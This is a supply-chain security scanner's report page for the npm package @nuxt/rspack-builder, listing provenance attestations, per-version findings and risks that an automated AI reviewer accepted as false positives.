@nuxt/rspack-builder — Greenflagged

rspack bundler for Nuxt

Supply chain provenance

Status for the latest visible version.

SLSA provenance attestation npm registry signatures No source commit

Maintainers

nuxtbot

Accepted risks

Findings the reviewer chose to accept rather than block on.

Source	Rule	Reason	Accepted by	When
provenance	publisher-changed	AI (provenance): Nuxt monorepo publishes via GitHub Actions CI/CD with SLSA attestation; this is the expected publisher going forward.	ai	2026/05/30
maintainer-change	maintainer-removed	AI (maintainer-change): Nuxt team consolidated publishing to GitHub Actions; maintainer list change is intentional org-level transition.	ai	2026/05/30
source-diff	obfuscated-file:dist/_chunks/libs/@vue/compiler-dom.d.mts	AI (source-diff): TypeScript declaration file with long re-export lines; not obfuscated.	ai	2026/05/18
source-diff	obfuscated-file:dist/_chunks/libs/@babel/parser.d.mts	AI (source-diff): TypeScript declaration file for @babel/types; long union type lines are expected.	ai	2026/05/18
source-diff	obfuscated-file:dist/_chunks/libs/@vue/compiler-core.d.mts	AI (source-diff): TypeScript declaration file with long type union lines; not obfuscated code.	ai	2026/05/18
source-diff	large-new-source-files	AI (source-diff): New files are type declaration bundles for known upstream packages.	ai	2026/05/18
source-diff	source-size-tripled	AI (source-diff): Size increase is from bundled type declarations for Vue/Babel deps, not injected payloads.	ai	2026/05/18
source-diff	net-exec-file:dist/_chunks/libs/@vue/compiler-core.d.mts	AI (source-diff): False positive on a .d.mts type declaration file; no runtime network or exec calls.	ai	2026/05/18
phantom-deps	phantom-dep:postcss-import	AI (phantom-deps): PostCSS plugin dep passed through config, not directly imported.	ai	2026/05/03
phantom-deps	phantom-dep:postcss-loader	AI (phantom-deps): Rspack loader dep passed through config, not directly imported.	ai	2026/05/03
phantom-deps	phantom-dep:cssnano	AI (phantom-deps): Rspack builder passes loaders/plugins to user config; declared deps not directly imported is expected pattern.	ai	2026/05/03
bogus-package	bogus-package	AI (bogus-package): Nuxt monorepo package; README link density is from framework docs, not a link farm.	ai	2026/05/03
phantom-deps	phantom-dep:pug-plain-loader	AI (phantom-deps): Rspack loader dep passed through config, not directly imported.	ai	2026/05/03
phantom-deps	phantom-dep:postcss	AI (phantom-deps): Same pattern: build-tool deps passed through to rspack config, not directly imported.	ai	2026/05/03
phantom-deps	phantom-dep:css-loader	AI (phantom-deps): Webpack/rspack loader dep passed through config, not directly imported.	ai	2026/05/03
phantom-deps	phantom-dep:tinyglobby	AI (phantom-deps): Utility dep used indirectly via config; stable false positive for this package.	ai	2026/05/03
phantom-deps	phantom-dep:url-loader	AI (phantom-deps): Rspack loader dep passed through config, not directly imported.	ai	2026/05/03
phantom-deps	phantom-dep:file-loader	AI (phantom-deps): Rspack loader dep passed through config, not directly imported.	ai	2026/05/03
phantom-deps	phantom-dep:postcss-url	AI (phantom-deps): PostCSS plugin dep passed through config, not directly imported.	ai	2026/05/03
phantom-deps	phantom-dep:autoprefixer	AI (phantom-deps): PostCSS plugin dep passed through config, not directly imported.	ai	2026/05/03

Versions (showing 26 of 26)

Version	Deps	Published
4.4.6	41 / 8	2026-05-18
4.4.5	41 / 8	2026-05-10
4.4.4	41 / 8	2026-04-29
4.4.2	42 / 8	2026-03-12
4.3.1	42 / 8	2026-02-07
4.3.0	42 / 8	2026-01-22
4.2.2	40 / 6	2025-12-09
4.2.1	40 / 6	2025-11-06
4.2.0	40 / 6	2025-10-25
4.1.3	39 / 6	2025-10-06
4.1.2	39 / 6	2025-09-12
4.1.1	39 / 6	2025-09-05
4.1.0	39 / 6	2025-09-02
4.0.3	39 / 6	2025-08-05
4.0.2	39 / 6	2025-07-29
4.0.1	39 / 6	2025-07-21
4.0.0	39 / 6	2025-07-15
3.21.7	40 / 9	2026-06-02
3.21.6	40 / 9	2026-05-18
3.21.5	40 / 9	2026-05-10
3.21.4	40 / 9	2026-04-29
3.21.2	41 / 9	2026-03-12
3.21.1	41 / 9	2026-02-07
3.21.0	41 / 9	2026-01-22
3.20.2	39 / 7	2025-12-09
3.20.1	39 / 7	2025-11-06

v4.4.6

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.4.5

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.4.4

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.4.2

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.3.1

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.3.0

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.2.2

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.2.1

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.2.0

2 findings

HIGH Publisher changed: danielroe → GitHub Actions (on 2025-10-25) provenance

This version was published by a different npm account than previous versions on 2025-10-25. This could indicate a legitimate maintainer transition or an account compromise.

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.1.3

2 findings

HIGH Publisher changed: danielroe → GitHub Actions (on 2025-10-06) provenance

This version was published by a different npm account than previous versions on 2025-10-06. This could indicate a legitimate maintainer transition or an account compromise.

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.1.2

2 findings

HIGH Publisher changed: danielroe → GitHub Actions (on 2025-09-12) provenance

This version was published by a different npm account than previous versions on 2025-09-12. This could indicate a legitimate maintainer transition or an account compromise.

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.1.1

2 findings

HIGH Publisher changed: danielroe → GitHub Actions (on 2025-09-05) provenance

This version was published by a different npm account than previous versions on 2025-09-05. This could indicate a legitimate maintainer transition or an account compromise.

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.1.0

2 findings

HIGH Publisher changed: danielroe → GitHub Actions (on 2025-09-02) provenance

This version was published by a different npm account than previous versions on 2025-09-02. This could indicate a legitimate maintainer transition or an account compromise.

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.0.3

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.0.2

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.0.1

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.0.0

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v3.21.7

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v3.21.6

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v3.21.5

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v3.21.4

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v3.21.2

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v3.21.1

5 findings

HIGH New obfuscated file: dist/_chunks/libs/@vue/compiler-core.d.mts source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New file with network + code execution: dist/_chunks/libs/@vue/compiler-core.d.mts source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

HIGH New obfuscated file: dist/_chunks/libs/@vue/compiler-dom.d.mts source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New obfuscated file: dist/_chunks/libs/@babel/parser.d.mts source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v3.21.0

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v3.20.2

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v3.20.1

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.